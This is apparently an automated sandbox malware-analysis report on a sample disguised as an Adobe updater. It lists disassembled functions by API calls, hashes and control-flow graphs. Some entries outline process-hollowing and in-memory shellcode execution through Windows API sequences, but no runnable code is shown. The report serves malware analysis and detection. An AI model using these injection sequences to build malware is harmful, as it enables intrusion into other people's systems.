                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: f
                                  • API String ID: 1834446548-3647721633
                                  • Opcode ID: 015e204f4a429be64435e1aa2ca838cb7ca65b26aad9600acf19bdcee34098b5
                                  • Instruction ID: 1f7687a8e49b74ca09466d5bac686fd3fa3f0823db06cc0705bb0b342e3bf1fe
                                  • Opcode Fuzzy Hash: 015e204f4a429be64435e1aa2ca838cb7ca65b26aad9600acf19bdcee34098b5
                                  • Instruction Fuzzy Hash: 8241E072A00258AFCF25CF68CC80BE9B7B5AB4D314F1491E9E549BA141D7B1FE81DB50
                                  APIs
                                  • EncodePointer.KERNEL32(00000000,?), ref: 00E97FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: EncodePointer
                                  • String ID: MOC$RCC
                                  • API String ID: 2118026453-2084237596
                                  • Opcode ID: 42fc11b7dbc811504849f03af79711e388ef704263ea7e538312962bbc0b31ed
                                  • Instruction ID: 6855c075d9a98adde1903ddad8be4f0de9cf324f9d42bb410bdaf18de300698e
                                  • Opcode Fuzzy Hash: 42fc11b7dbc811504849f03af79711e388ef704263ea7e538312962bbc0b31ed
                                  • Instruction Fuzzy Hash: 3641A972A00209AFDF26CF98CD85AEEBBB1FF49304F189059F904B7261D735A994CB50
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue,00000000,?,00E9792D,?,00E95C62), ref: 00E989A5
                                  • GetProcAddress.KERNEL32(00000000,?,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue,00000000,?,00E9792D), ref: 00E989AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: AddressFreeLibraryProc
                                  • String ID: b\
                                  • API String ID: 3013587201-3493366257
                                  • Opcode ID: 69602aaeaa726d287e29851ec9efb280d28b38a81fef013e212caf0f7412a7ad
                                  • Instruction ID: 6808e52866b697250f53339f403fb3b5fead245f00947071f3569649fd7f0312
                                  • Opcode Fuzzy Hash: 69602aaeaa726d287e29851ec9efb280d28b38a81fef013e212caf0f7412a7ad
                                  • Instruction Fuzzy Hash: 1B11B135600115AFCF22CF64DD809B973A4FB8B3647142159EA0AF7220DF31ED01DB92

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 007A02FC
                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 007A030F
                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 007A032D
                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 007A0351
                                  • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 007A037C
                                  • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 007A03D4
                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 007A041F
                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 007A045D
                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 007A0499
                                  • ResumeThread.KERNELBASE(?), ref: 007A04A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2283598763.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_7a0000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                  • String ID: GetP$Load$aryA$ress
                                  • API String ID: 2687962208-977067982
                                  • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                  • Instruction ID: 94d2544db2dcf14e7deb5fccae4f007d013abbd52beeb77c932c08cccaf34fe0
                                  • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                  • Instruction Fuzzy Hash: 49B1E67664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CEB341D774FA518B94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 23 e9efa8-e9efb4 24 e9f046-e9f049 23->24 25 e9efb9-e9efca 24->25 26 e9f04f 24->26 28 e9efcc-e9efcf 25->28 29 e9efd7-e9eff0 LoadLibraryExW 25->29 27 e9f051-e9f055 26->27 30 e9f06f-e9f071 28->30 31 e9efd5 28->31 32 e9eff2-e9effb GetLastError 29->32 33 e9f056-e9f066 29->33 30->27 35 e9f043 31->35 36 e9effd-e9f00f call e9e6d8 32->36 37 e9f034-e9f041 32->37 33->30 34 e9f068-e9f069 FreeLibrary 33->34 34->30 35->24 36->37 40 e9f011-e9f023 call e9e6d8 36->40 37->35 40->37 43 e9f025-e9f032 LoadLibraryExW 40->43 43->33 43->37
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,DFBDDF9F,?,00E9F0B5,?,?,00000000,00000000), ref: 00E9F069
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3664257935-537541572
                                  • Opcode ID: cbc65622fcaf67d530017bbdc90f3c4536352f9595b53799dfab4738f3d4a284
                                  • Instruction ID: 531a082dae165969a8cf78a3014fc92928714ced363a10a022ebe910df38e6f1
                                  • Opcode Fuzzy Hash: cbc65622fcaf67d530017bbdc90f3c4536352f9595b53799dfab4738f3d4a284
                                  • Instruction Fuzzy Hash: F4212731A01210ABCF219B21AC84A9E375CAF123B8F241130EA16FB3D2EB70FD01C6D0

                                  Control-flow Graph

                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,00EAC2E6), ref: 00EAC20B
                                    • Part of subcall function 00EAC151: _Deallocate.LIBCONCRT ref: 00EAC1EC
                                  • CreateThread.KERNELBASE(00000000,00000000,00000188,MZx,00000000,00000000), ref: 00EAC23F
                                  • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00EAC2E6), ref: 00EAC24B
                                  • CloseHandle.KERNEL32(00000000,?,?,00EAC2E6), ref: 00EAC252
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: AllocCloseCreateDeallocateHandleObjectSingleThreadVirtualWait
                                  • String ID: MZx$ole
                                  • API String ID: 440434604-1145851472
                                  • Opcode ID: 6463a8d50277f3c4b53054591b0db264c8906deacfc08482ce9ad8c93e83a081
                                  • Instruction ID: 1633923686453f40df89e3ac8e856e3ca609d198f55b319506146c2214cbcf21
                                  • Opcode Fuzzy Hash: 6463a8d50277f3c4b53054591b0db264c8906deacfc08482ce9ad8c93e83a081
                                  • Instruction Fuzzy Hash: 8EF0827620511C7FD15137639C89EBB3A6DDB8B7E5F520110FA06A55828A15380642B5

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,?,00E9C0A3,00000000,00E98CD2,?,?,DFBDDF9F,00E98CD2,?), ref: 00E9C0BA
                                  • TerminateProcess.KERNEL32(00000000,?,00E9C0A3,00000000,00E98CD2,?,?,DFBDDF9F,00E98CD2,?), ref: 00E9C0C1
                                  • ExitProcess.KERNEL32 ref: 00E9C0D3
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: 7caa8a29e93a9639033a1bd73f9491d313d61c46a3cc284cb5260588b34cbf47
                                  • Instruction ID: 44878a17598652e8df88adc4f280fbc9bb5504e7561fb5ff914db8be4462ab1a
                                  • Opcode Fuzzy Hash: 7caa8a29e93a9639033a1bd73f9491d313d61c46a3cc284cb5260588b34cbf47
                                  • Instruction Fuzzy Hash: 4ED09E71004504AFCF113F62ED4D9593F77AF45395F145010B90A6A432CF36ED579B44

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 58 e9f073-e9f09b 59 e9f09d-e9f09f 58->59 60 e9f0a1-e9f0a3 58->60 61 e9f0f2-e9f0f5 59->61 62 e9f0a9-e9f0b0 call e9efa8 60->62 63 e9f0a5-e9f0a7 60->63 65 e9f0b5-e9f0b9 62->65 63->61 66 e9f0d8-e9f0ef 65->66 67 e9f0bb-e9f0c9 GetProcAddress 65->67 69 e9f0f1 66->69 67->66 68 e9f0cb-e9f0d6 call e9b82a 67->68 68->69 69->61
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fa6722bbc991906530b4035533fa1b1177c508fed8724ee954fbf580649bb906
                                  • Instruction ID: a299e3028251d603d316f054dfa31129e2c782da87b48dd54c9655d9064c33d5
                                  • Opcode Fuzzy Hash: fa6722bbc991906530b4035533fa1b1177c508fed8724ee954fbf580649bb906
                                  • Instruction Fuzzy Hash: A501F533300215AFDF258E69EC4595A33EABBC53607649134F904EB195DE30D84197A0
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00EA78B4,00000002,00000000,?,?,?,00EA78B4,?,00000000), ref: 00EA762F
                                  • GetLocaleInfoW.KERNEL32(?,20001004,00EA78B4,00000002,00000000,?,?,?,00EA78B4,?,00000000), ref: 00EA7658
                                  • GetACP.KERNEL32(?,?,00EA78B4,?,00000000), ref: 00EA766D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 100be28a33d216be962d576ddf39be0283bb1c11ff52b693bb123eb40b84250b
                                  • Instruction ID: 30ab302e0cea297d5704a862d9b9e0eefe54e235907f06efe18418c27819bece
                                  • Opcode Fuzzy Hash: 100be28a33d216be962d576ddf39be0283bb1c11ff52b693bb123eb40b84250b
                                  • Instruction Fuzzy Hash: 2B219521A08500AADB34CF19CD05BD773A7EF9AB98B569464E98AFF100E732FD41C350
                                  APIs
                                    • Part of subcall function 00E9EA50: GetLastError.KERNEL32(?,00000008,00EA2F56,00000000,00E98E50), ref: 00E9EA54
                                    • Part of subcall function 00E9EA50: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00E9EAF6
                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00EA7877
                                  • IsValidCodePage.KERNEL32(00000000), ref: 00EA78C0
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00EA78CF
                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EA7917
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EA7936
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 415426439-0
                                  • Opcode ID: f0d78630b8292c2b78c93cfb8dcbd1399f003d2d7bc79442b6b0ab7f68b7b50c
                                  • Instruction ID: d1066bc1f813f45b51d3cdaca275b2a85df5e28fdf8f1cf616956ad50ab9bf17
                                  • Opcode Fuzzy Hash: f0d78630b8292c2b78c93cfb8dcbd1399f003d2d7bc79442b6b0ab7f68b7b50c
                                  • Instruction Fuzzy Hash: 8151AD71A04215AFEB14DFA5CC85ABE77B8BF0E300F145429E581FB150EB74A904CB60
                                  APIs
                                    • Part of subcall function 00E9EA50: GetLastError.KERNEL32(?,00000008,00EA2F56,00000000,00E98E50), ref: 00E9EA54
                                    • Part of subcall function 00E9EA50: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00E9EAF6
                                  • GetACP.KERNEL32(?,?,?,?,?,?,00E9CA5C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EA6EC8
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00E9CA5C,?,?,?,00000055,?,-00000050,?,?), ref: 00EA6EF3
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00EA7056
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 607553120-905460609
                                  • Opcode ID: f794de5b02e87bdd7d9d06a5cce964d869aba2c34588bd4213965714a6980fdf
                                  • Instruction ID: 8b6b53462f19656ba86964cd8b2b70a144c8888795098cdf0ccaecdc25c39e96
                                  • Opcode Fuzzy Hash: f794de5b02e87bdd7d9d06a5cce964d869aba2c34588bd4213965714a6980fdf
                                  • Instruction Fuzzy Hash: CC71C275700206AEDB24AF34DC46BAA77E8EF4F708F18642AF505FE581EB74F9408660
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00E94D72
                                  • IsDebuggerPresent.KERNEL32 ref: 00E94E3E
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E94E57
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00E94E61
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                  • String ID:
                                  • API String ID: 254469556-0
                                  • Opcode ID: c90c9d26c5511564ec75fdf80d51741ce405a7e7a49160083a8ec9ea909f92c7
                                  • Instruction ID: fcacecbf968194ebf7d998c59bc7e4a1899098b1fc839e5f45e7d303bf55459f
                                  • Opcode Fuzzy Hash: c90c9d26c5511564ec75fdf80d51741ce405a7e7a49160083a8ec9ea909f92c7
                                  • Instruction Fuzzy Hash: 993107B5D052189ADF21DF64D989BCDBBB8AF08300F1051AAE40DAB290E7719A858F44

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00E910D0: __EH_prolog3_catch.LIBCMT ref: 00E910D7
                                    • Part of subcall function 00E910D0: _strlen.LIBCMT ref: 00E910E9
                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00EAC285
                                    • Part of subcall function 00E9163E: _strlen.LIBCMT ref: 00E91656
                                  • _strlen.LIBCMT ref: 00EAC2A0
                                  • _strlen.LIBCMT ref: 00EAC2B6
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00EAC2D3
                                    • Part of subcall function 00EAC1F7: VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,00EAC2E6), ref: 00EAC20B
                                    • Part of subcall function 00EAC1F7: CreateThread.KERNELBASE(00000000,00000000,00000188,MZx,00000000,00000000), ref: 00EAC23F
                                    • Part of subcall function 00EAC1F7: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00EAC2E6), ref: 00EAC24B
                                    • Part of subcall function 00EAC1F7: CloseHandle.KERNEL32(00000000,?,?,00EAC2E6), ref: 00EAC252
                                    • Part of subcall function 00E91BEA: _Deallocate.LIBCONCRT ref: 00E91BF9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: _strlen$Handle$AddressAllocCloseCreateDeallocateH_prolog3_catchModuleObjectProcSingleThreadVirtualWait
                                  • String ID: Cons$Free$Madino Mino$kernel32.dll$ole
                                  • API String ID: 4115190924-2348686229
                                  • Opcode ID: 38a36dfee23a992dc4474ad69c17ab62df18b1a6842da7bdad5d8eb0f07c2e05
                                  • Instruction ID: c3519cf0fd71efebbf88634c3a0ce197cdafabd5045aa524cd8769405ea26613
                                  • Opcode Fuzzy Hash: 38a36dfee23a992dc4474ad69c17ab62df18b1a6842da7bdad5d8eb0f07c2e05
                                  • Instruction Fuzzy Hash: 0E018471E08209AEDF14EBA4DC46CFEB3F8EE9A710710105AF802B6191EE74B906D665

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 201 e97be8-e97c13 call e98b60 204 e97c19-e97c1c 201->204 205 e97f87-e97f8c call e9aff7 201->205 204->205 206 e97c22-e97c2b 204->206 208 e97d28-e97d2e 206->208 209 e97c31-e97c35 206->209 212 e97d36-e97d44 208->212 209->208 211 e97c3b-e97c42 209->211 213 e97c5a-e97c5f 211->213 214 e97c44-e97c4b 211->214 215 e97d4a-e97d4e 212->215 216 e97ef0-e97ef3 212->216 213->208 219 e97c65-e97c6d call e9786c 213->219 214->213 218 e97c4d-e97c54 214->218 215->216 217 e97d54-e97d5b 215->217 220 e97ef5-e97ef8 216->220 221 e97f16-e97f1f call e9786c 216->221 222 e97d5d-e97d64 217->222 223 e97d73-e97d79 217->223 218->208 218->213 233 e97f21-e97f25 219->233 234 e97c73-e97c8c call e9786c * 2 219->234 220->205 226 e97efe-e97f13 call e97f8d 220->226 221->205 221->233 222->223 229 e97d66-e97d6d 222->229 230 e97d7f-e97da6 call e958ae 223->230 231 e97e90-e97e94 223->231 226->221 229->216 229->223 230->231 246 e97dac-e97daf 230->246 237 e97ea0-e97eac 231->237 238 e97e96-e97e9f call e95c94 231->238 234->205 260 e97c92-e97c98 234->260 237->221 242 e97eae-e97eb8 237->242 238->237 243 e97eba-e97ebc 242->243 244 e97ec6-e97ec8 242->244 243->221 248 e97ebe-e97ec2 243->248 249 e97eca-e97edd call e9786c * 2 244->249 250 e97edf-e97eec call e98606 244->250 252 e97db2-e97dc7 246->252 248->221 253 e97ec4 248->253 276 e97f26 call e9df7a 249->276 268 e97f4b-e97f60 call e9786c * 2 250->268 269 e97eee 250->269 256 e97dcd-e97dd0 252->256 257 e97e71-e97e84 252->257 253->249 256->257 262 e97dd6-e97dde 256->262 257->252 261 e97e8a-e97e8d 257->261 265 e97c9a-e97c9e 260->265 266 e97cc4-e97ccc call e9786c 260->266 261->231 262->257 267 e97de4-e97df8 262->267 265->266 271 e97ca0-e97ca7 265->271 287 e97cce-e97cee call e9786c * 2 call e98606 266->287 288 e97d30-e97d33 266->288 272 e97dfb-e97e0c 267->272 297 e97f62 268->297 298 e97f65-e97f82 call e95a9a call e98506 call e986c3 call e9847d 268->298 269->221 277 e97ca9-e97cb0 271->277 278 e97cbb-e97cbe 271->278 279 e97e0e-e97e1f call e980c3 272->279 280 e97e32-e97e3f 272->280 292 e97f2b-e97f46 call e95c94 call e98277 call e95842 276->292 277->278 285 e97cb2-e97cb9 277->285 278->205 278->266 294 e97e21-e97e2a 279->294 295 e97e43-e97e6b call e97b68 279->295 280->272 283 e97e41 280->283 291 e97e6e 283->291 285->266 285->278 287->288 315 e97cf0-e97cf5 287->315 288->212 291->257 292->268 294->279 300 e97e2c-e97e2f 294->300 295->291 297->298 298->205 300->280 315->276 317 e97cfb-e97d0e call e9828f 315->317 317->292 322 e97d14-e97d20 317->322 322->276 323 e97d26 322->323 323->317
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 00E97D07
                                  • ___TypeMatch.LIBVCRUNTIME ref: 00E97E15
                                  • _UnwindNestedFrames.LIBCMT ref: 00E97F67
                                  • CallUnexpected.LIBVCRUNTIME ref: 00E97F82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2751267872-393685449
                                  • Opcode ID: 98e722e0d01a983d7a1a3cbe0355ed175c9e4e8ca1f00574275b4e66134de1a6
                                  • Instruction ID: 762c12f6d874837080efa91a7247b2f99907319de97b1b78c8a6181717cfa205
                                  • Opcode Fuzzy Hash: 98e722e0d01a983d7a1a3cbe0355ed175c9e4e8ca1f00574275b4e66134de1a6
                                  • Instruction Fuzzy Hash: EEB18A71928209EFCF29DFA4C8819AEBBB5BF04314F146059E8917B212D731EE59CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 324 ea163c-ea164c 325 ea164e-ea1661 call e9b0c5 call e9b0d8 324->325 326 ea1666-ea1668 324->326 343 ea19d4 325->343 328 ea166e-ea1674 326->328 329 ea19bc-ea19c9 call e9b0c5 call e9b0d8 326->329 328->329 332 ea167a-ea16a6 328->332 348 ea19cf call e98ecf 329->348 332->329 335 ea16ac-ea16b5 332->335 338 ea16cf-ea16d1 335->338 339 ea16b7-ea16ca call e9b0c5 call e9b0d8 335->339 341 ea19b8-ea19ba 338->341 342 ea16d7-ea16db 338->342 339->348 346 ea19d7-ea19da 341->346 342->341 347 ea16e1-ea16e5 342->347 343->346 347->339 351 ea16e7-ea16fe 347->351 348->343 353 ea1743-ea1749 351->353 354 ea1700-ea1703 351->354 355 ea171a-ea1731 call e9b0c5 call e9b0d8 call e98ecf 353->355 356 ea174b-ea1752 353->356 357 ea1712-ea1718 354->357 358 ea1705-ea170d 354->358 387 ea18ef 355->387 359 ea1756-ea1774 call ea1dc1 call e9ed98 * 2 356->359 360 ea1754 356->360 357->355 362 ea1736-ea1741 357->362 361 ea17c3-ea17d6 358->361 398 ea1791-ea17b9 call ea1be2 359->398 399 ea1776-ea178c call e9b0d8 call e9b0c5 359->399 360->359 366 ea17dc-ea17e8 361->366 367 ea1892-ea189b call ea7fe6 361->367 364 ea17c0 362->364 364->361 366->367 371 ea17ee-ea17f0 366->371 378 ea190c 367->378 379 ea189d-ea18af 367->379 371->367 375 ea17f6-ea1817 371->375 375->367 381 ea1819-ea182f 375->381 383 ea1910-ea1926 ReadFile 378->383 379->378 384 ea18b1-ea18c0 GetConsoleMode 379->384 381->367 386 